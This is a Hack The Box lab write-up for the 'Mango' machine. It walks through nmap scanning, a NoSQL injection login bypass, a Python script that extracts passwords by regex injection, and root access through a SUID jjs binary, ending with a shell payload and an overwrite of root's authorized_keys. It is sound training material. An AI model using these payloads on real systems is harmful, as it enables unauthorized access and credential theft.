Quick Summary
→ Another awesome machine – "Mango" is a medium difficulty box that was vulnerable into NoSQL injection attack. I was stuck on the main page and the analytics page for an hour until i realize that was only a rabbit hole. There was a login page in staging-order.mango.htb that’s appeal on my NMAP scan. When I go to the forum I found out that the web apps use MongoDB when you try to search on google Mango db it’s a database program, classified as a NoSQL database program.
Using payload from PayloadAllTheThings i managed to bypass the login page’ but when I get in i’ll redirect at a Under Plantation page that was another rabbit hole, but it’s okay because I have now the idea that the machine is vulnerable to NoSQL Injection attack. With my python script i get the credentials for user mango & admin to get in to the machine via SSH and get the user.txt.
In the privilege escalation part there was a vulnerable software installed which is the jjs – a java program command-line tool that is used to invoke the Nashorn engine. You can use it to interpret one or several script files, or to run an interactive shell.
I abuse the vulnerabilty by reading the root.txt and also inject my own SSH key and get in to the machine and got the administrator shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Exploring the Analytics page
→ check the ssl certicate of the webapps
Post - Exploitation
→ Trying to bypass the Login page at staging-order.mango.htb
→ with this payload from PayloadAllTheThings - NoSQL Injection Attack I managed to bypass the login
Exploitation
→ bruteforce the credentials of user – mango & admin using python script
→ After a minutes finally gets the both creds, Login with SSH Key and get the user.txt
Privilege Escalation
→ execute LinEnum.sh to look what we can do the machine
→ look for what permission is allowed to user – admin
→ found the vulnerable software – jjs
→ with the help from GTFObins - jjs I can execute File read command to get root.txt
→ I can also inject SSH keys with File write command
→ Login with my generated SSH keys and become the administrator.
Network Scanning
Walkthrough
→ I always begin at NMAP to look on the services what is running. I always use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
- -A- ⇒ Agressive scan
- -oN ⇒ to save our scan results to a text file
# bash
nmap -sV -sC -A -T4 10.10.10.162 -oN nmap-Mango
|
root in htb/boxes/Mango
❯ nmap -sV -sC -A 10.10.10.162 -oN nmap-Mango
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 05:31 PST
Nmap scan report for 10.10.10.162
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=30519%PV=Y%DS=2%DC=T%G=Y%TM=5E9B71D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 209.53 ms 10.10.14.1
2 216.74 ms 10.10.10.162
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds
root in htb/boxes/Mango took 48s
❯
|
Nmap results
So there’s port open.
- 22 ⇒ which basically use for SSH Connections
- 80 ⇒ which basically running a website
- 443 ⇒ which holding SSL Certificate with
"staging-order.mango.htb" I added it to my /etc/hosts file.
Enumeration
Mango Website
Normally i explore first the website’ because that will give us interesting stuffs so :
The main page is looks like a google search right ? At first I didn’t realize that the main page is a hint for this machine i will tell it later.
Next i clicked on the analytics tabs :
This page is totally a rabbit hole’ I can’t do anything about the website so I check the SSL Certifcate and it was registed at staging-order.mango.htb so I added it into my /etc/hosts file.
So after that I visited staging-order.mango.htb and it was a Login page.
Post - Exploitation
Bypass Login
I mention about that the main page is looks like a google search’ I realized that was hint to give me idea what should I do for this phase. From the forum it’s a database, the name MANGO is a big hint, so I go to google and search about Mango DB and it give me a results MongoDB which use NoSQL
database program.
so I search about NoSQL Injection Attack and I found this then tried to login with some credentials and used Burp Suite to intercept the request, then modified the request body parameters base on the payload so :
POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1
username[$ne]=payas0&password[$ne]=payas0&login=login
|
I modified the username & password parameters by adding this [$ne] sending this it will return to HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 18 Apr 2020 22:22:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3380
Connection: close
Content-Type: text/html; charset=UTF-8
|
Follow redirection and it will go to /home.php
GET /home.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1
|
Under Plantation
when I finally bypass the login it goes me to Under Plantation page :
As you can see at the page there was a user – admin@mango.htb so I will keep it to my mind.
Now that I’m in I try to bruteforce the website under /home.php but bruteforcing is not really helpful until I found that this page is a rabbit hole again. but I have got a user admin and also already know that this was vulnerable to NoSQL Injection attack.
Exploitation
NoSQL Injection
I search about MongoDB - NoSQL Injection attack luckily i found this article it is about extracting admin password from the database using NoSQL Injections.
So then I made a python script that will automate the extraction of password similar to the article, this will need patience because password will reveal one by one so :
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="mango"
password=""
u="http://staging-order.mango.htb"
headers={'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|','&','\\']:
payload='username=%s&password[$regex]=^%s.*&login=login'% (username,password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if r.status_code == 302:
print("Found one more char : %s" % (password+c))
password += c
|
Get user shell
after almost 10 minutes I complete extracting the user mango password
Now login this with SSH I have now finally the initial shell.
root in htb/boxes/Mango via 🐍 v2.7.17
❯ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Apr 18 22:39:50 UTC 2020
System load: 0.01 Processes: 103
Usage of /: 25.9% of 19.56GB Users logged in: 0
Memory usage: 11% IP address for ens33: 10.10.10.162
Swap usage: 3%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Apr 18 21:49:56 2020 from 10.10.14.192
mango@mango:~$
|
I thought i can now get the user.txt until I remember there was another user that I see on the Under Plantation page the admin user. The next I did is to extract also the password using my python script, I just change only the line – username:"mango" to username:"admin" and execute the script.
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://staging-order.mango.htb"
headers={'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|','&','\\']:
payload='username=%s&password[$regex]=^%s.*&login=login'% (username,password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if r.status_code == 302:
print("Found one more char : %s" % (password+c))
password += c
|
after 10 minutes the admin password is completed.
now with mango shell I just switch the user and finally get the user.txt :
mango@mango:~$ su admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ ls
exploit.sh leon.sh
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@mango:/home/mango$ cd ..
admin@mango:/home$ ls
admin mango
admin@mango:/home$ cd admin
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
79bf3[---------------------]47e92
admin@mango:/home/admin$
|
Privilege Escalation
JJS Exploitation
For privilege escalation phase I will use LinEnum.sh to look for some stuffs that I will use to get the admin shell.
so from my Kali Linux machine, i transfer LinEnum to the target and execute.
As always it will show the basic information of the vulnerable machine.
# bash
admin@mango:/tmp$ bash LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Sat Apr 18 22:52:10 UTC 2020
### SYSTEM ##############################################
[-] Kernel information:
Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.15.0-64-generic (buildd@lgw01-amd64-038) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.2 LTS"
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
[-] Hostname:
mango
### USER/GROUP ##########################################
[-] Current user/group info:
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/1 10.10.14.247 Sat Apr 18 21:13:13 +0000 2020
mango pts/0 10.10.15.230 Sat Apr 18 22:39:51 +0000 2020
[-] Who else is logged on:
22:52:10 up 1:41, 1 user, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mango pts/0 10.10.15.230 22:39 2.00s 2.52s 0.01s sshd: mango [priv]
|
Going deep of the recon I see interesting stuffs which is the JJS installed.
# bash
[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
|
As you can see jjs is owned also by root, after the script is finish running. I also checked the other SUID :
admin@mango:/home/mango$ find / -perm -4000 -user root 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
admin@mango:/home/mango$
|
Get the root.txt
I get a hint from the forum, the privilege escalation part is #GTFObins so I go the website and checked about JJS :
According to #GTFObins, we are able to spawn an interactive shell with elevated permissions, I used File read to catch root.txt at /root/ directory and yes ! I’m allowed to read that.
# java
admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }
8a8ef[---------------------]9ab15
jjs> exit()
admin@mango:/home/admin$
|
I also try the SUID when I execute it my session terminal shell is hang up but I get the administrator shell.
# java
admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/pts/1 >/dev/pts/1 2>/dev/pts/1').waitFor()
#
|
Administrator Shell
I am not satisfy what I did because I want to catch the admin shell and get again the root.txt I have only one options remaining the File write functions.
So my idea is to inject SSH key to /root/.ssh/ directory and login as root with my rsa keys so first i will generate my SSH Keys with commad 'ssh-key -t rsa' then copy the id_rsa.pub and echo it into a file in the /tmp directory so :
admin@mango:/home/mango$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrIFVL39sxNcAJY5yNM2XxpZtDIeZXI3/HrPW465dJPzS8QqnytUf8pYR2cg9tk3E5CV4XjaYn3MxwDuQ3b5NWjvnqS/8KOCyM1FKQAON/zE055LmxUsv4XysN6bD5HK/wtykAdHCOTvnN2PSQjUMCLe7RDep4Y37KvJdiyN1BnoccHqFo+7BV2PnuBk5rs5o1cG13Knex5hTQhbgXvARqy8nGLeJGjrryl2xsKdyBYeKzBsLLKIEj12LVWBk4zkedDLdcSBMMaioowjB53b+m0/Rel0DT35MLxK1evJL5O2QSQE4qicRKt+verPogttcwq8zWn21orFasRN65kjWM8LKzdgqt8XpGEZ6L/ATZr4rhgu2eduGOuWwMWob6MttdT7X4qAZsfrMdTKuVdJa217dq4U72CJ3a6Re0CQrRxS7eoQHWcYvYIewWbHq/ro+xsyTR7gMDmW82UoE0TZV3/b9WXWgjdQvnVVQ8rxJHVegZAUCFq8LwwBq/Alh6gys= root@Payas0" > /tmp/ssh
|
And now overwrite the root’s authorized_keys file :
admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()
0
jjs>
admin@mango:/home/mango$
|
Now that I setup all’ I’ll login as a root and finally have the last shell and also catch again the root.txt :
root in htb/boxes/Mango via 🐍 v2.7.17
❯ ssh -i /root/.ssh/id_rsa root@10.10.10.162
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Apr 18 23:40:32 UTC 2020
System load: 0.04 Processes: 114
Usage of /: 25.8% of 19.56GB Users logged in: 1
Memory usage: 11% IP address for ens33: 10.10.10.162
Swap usage: 4%
* Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.
https://ubuntu.com/kubernetes/docs/release-notes
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Apr 18 23:25:35 2020 from 10.10.14.43
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mango:~# ls
root.txt
root@mango:~# cat root.txt
8a8ef[---------------------]9ab15
root@mango:~#
|
If you liked my writeup please leave a respect on my Profile
Referrences:
Extracting MongoDB password with NoSQL Injection
NoSQL Injection
Java gives a shell for everthing
#GTFObins - JJS